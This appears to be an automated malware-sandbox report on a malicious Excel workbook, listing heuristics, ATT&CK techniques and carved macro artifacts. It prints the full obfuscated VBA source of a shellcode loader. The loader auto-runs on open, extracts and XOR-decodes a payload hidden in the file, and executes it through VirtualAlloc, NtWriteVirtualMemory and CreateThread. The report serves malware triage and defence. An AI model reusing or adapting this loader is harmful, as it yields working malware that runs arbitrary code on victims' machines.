MALICIOUS
78
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains both Excel 4.0 (XLM) and VBA macros, with the VBA macros referencing Win32 API functions like VirtualAlloc and CreateThread. This suggests the macro is designed to allocate memory and execute shellcode, likely a second-stage payload. The presence of both macro types and the API calls point towards a downloader or dropper functionality.
Heuristics 6
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() oTVSpOqBmopNcGR -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() Document_Open -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes |
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4736 bytes |
SHA-256: 3370d9f502661f379429f9a3b0fa0919b7ccd4bf634a30492dfc8fcd4b0ed494 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
35 of 70 identifiers look randomly generated (e.g. 'zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGD') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread" (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As LongPtr, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As LongPtr
Private Declare PtrSafe Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As LongPtr, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As LongPtr, ByVal lIYUtUgJzcn As LongPtr, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As LongPtr, ByRef SUSKHSVf As LongPtr) As LongPtr
#Else
Private Declare Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread" (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As Long, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As Long
Private Declare Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As Long, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As Long, ByVal lIYUtUgJzcn As Long, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As Long, ByRef SUSKHSVf As Long) As Long
#End If
Const mnFuhDfKvQHgUisvxL = &H1000
Const sswxspBrjhMY = &H40
Public Sub oTVSpOqBmopNcGR()
Dim TPLYmybAh() As Byte
TPLYmybAh = dFBgqsXGxAtVKCECEoiJZUEu(ActiveWorkbook.FullName)
Dim OhVBlZ As String
OhVBlZ = StrConv(TPLYmybAh, 64)
Dim dAuZnSnrpKXUGVyOXV
dAuZnSnrpKXUGVyOXV = Split(OhVBlZ, "zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGDYdlAZnpVYOzKQyJaKFkRnQVBktpWJiEFnJEdoJVwOKbnjECRdiChlOqhiJpFXtmPkTwgUFMaJOdDOHsGQyTBFwtytwVEuqzuyldphvXxvCyxLMtAqJOzALjNAXNyJhGtpIeCDdzvB")
Dim ziiQRvKnZjFLdqlYgwiGWxGX As String
Dim PjbgjZajqFy As String
Dim JIPOuyFscUpOCTUykmzSeYmEO As String
PjbgjZajqFy = StrConv(StrConv(dAuZnSnrpKXUGVyOXV(UBound(dAuZnSnrpKXUGVyOXV)), 64), 128)
JIPOuyFscUpOCTUykmzSeYmEO = Mid$(PjbgjZajqFy, 3, Len(PjbgjZajqFy))
ziiQRvKnZjFLdqlYgwiGWxGX = WJPyO("fdYWNGcvoKBZUNbqPj", JIPOuyFscUpOCTUykmzSeYmEO)
#If VBA7 Then
Dim GcpnLvPzvO As LongPtr
Dim eIhjodoRfxikPQne As LongPtr
#Else
Dim GcpnLvPzvO As Long
Dim eIhjodoRfxikPQne As Long
#End If
GcpnLvPzvO = vkaWKlhNTeWRNiTISHfF(0, Len(ziiQRvKnZjFLdqlYgwiGWxGX), mnFuhDfKvQHgUisvxL, sswxspBrjhMY)
eIhjodoRfxikPQne = NtWriteVirtualMemory(-1, GcpnLvPzvO, ziiQRvKnZjFLdqlYgwiGWxGX, Len(ziiQRvKnZjFLdqlYgwiGWxGX), 0)
eIhjodoRfxikPQne = yzyJNyjBvkeFDlPGoJTVRjIAv(0, 0, GcpnLvPzvO, 0, 0, 0)
End Sub
Public Function dFBgqsXGxAtVKCECEoiJZUEu(ByVal rsOpRbBlbNPigJQHeFQSdwTEdsjx As String) As Byte()
Dim PjbgjZajqFy As Long
Dim JIPOuyFscUpOCTUykmzSeYmEO() As Byte
PjbgjZajqFy = FreeFile
If LenB(Dir(rsOpRbBlbNPigJQHeFQSdwTEdsjx)) Then
Open rsOpRbBlbNPigJQHeFQSdwTEdsjx For Binary Access Read As PjbgjZajqFy
ReDim JIPOuyFscUpOCTUykmzSeYmEO(LOF(PjbgjZajqFy) - 1&) As Byte
Get PjbgjZajqFy, , JIPOuyFscUpOCTUykmzSeYmEO
Close PjbgjZajqFy
Else
Err.Raise 53
End If
dFBgqsXGxAtVKCECEoiJZUEu = JIPOuyFscUpOCTUykmzSeYmEO
Erase JIPOuyFscUpOCTUykmzSeYmEO
End Function
Public Sub Document_Open()
oTVSpOqBmopNcGR
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function WJPyO(ratOeQJTEfkUUnEpeBYegFNLvkZsB As String, CEgpwCzgutDFoYOsKBxGFnzJTMn As String) As String
Dim tTQrrIDGOFRbQYhEBAqPW As Long
Dim AyUUqo As String
Dim wvKoRNA As Integer, PoGKTwQZoQYni As Integer, a As Long
For tTQrrIDGOFRbQYhEBAqPW = 1 To Len(CEgpwCzgutDFoYOsKBxGFnzJTMn)
a = tTQrrIDGOFRbQYhEBAqPW Mod Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
If a = 0 Then a = Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
wvKoRNA = Asc(Mid$(CEgpwCzgutDFoYOsKBxGFnzJTMn, tTQrrIDGOFRbQYhEBAqPW, 1))
PoGKTwQZoQYni = Asc(Mid$(ratOeQJTEfkUUnEpeBYegFNLvkZsB, a, 1))
AyUUqo = AyUUqo + Chr(wvKoRNA Xor PoGKTwQZoQYni)
Next tTQrrIDGOFRbQYhEBAqPW
WJPyO = AyUUqo
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.